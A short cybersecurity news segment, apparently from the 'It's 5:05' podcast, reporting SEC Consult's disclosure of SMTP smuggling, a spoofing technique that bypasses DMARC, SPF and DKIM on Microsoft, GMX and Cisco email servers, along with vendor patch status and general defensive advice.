YouTube player

A recently discovered “SMTP smuggling” technique is allowing cyber attackers to sidestep email security protocols like Domain-based Message Authentication, Reporting, and Conformance (DMARC), posing a significant threat to organizations. The method leverages vulnerabilities in Microsoft, GMX, and Cisco Secure Email Gateway servers, enabling attackers to spoof millions of email addresses for targeted phishing attacks.

A security researcher from SEC consult revealed that the technique exploits zero-day flaws in messaging servers, allowing attackers to send malicious emails with fake sender addresses. The vulnerabilities in Microsoft and GMX have been patched, but the potential for misconfiguration in Cisco Secure Email remains unaddressed.

SMTP smuggling is a part of the “smuggling vulnerability” family, taking advantage of differing interpretations of the SMTP protocol. By exploiting how servers interpret the end-of-data code sequence, attackers can break out of the message data, specify arbitrary commands, and send fake emails. The technique makes malicious emails appear legitimate by bypassing checks from email protection protocols like DMARC, SPF, and DomainKeys Identified Mail (DKIM).

Enterprises are particularly at risk, as attackers can use this method for targeted social engineering and spear-phishing attacks. The vulnerabilities were found in Microsoft Exchange Online, GMX, and Cisco Secure Email Cloud Gateway, affecting millions of SMTP servers. Microsoft and GMX have patched their flaws, but Cisco sees the issue as a “feature” and won’t issue a warning to customers.

Security experts advise organizations to remain vigilant, conduct periodic awareness training, and perform regular security tests to identify vulnerabilities in their infrastructure. The incident underscores the importance of addressing default settings and implementing robust security measures to protect against evolving cyber threats.

This segment was created for the It’s 5:05 podcast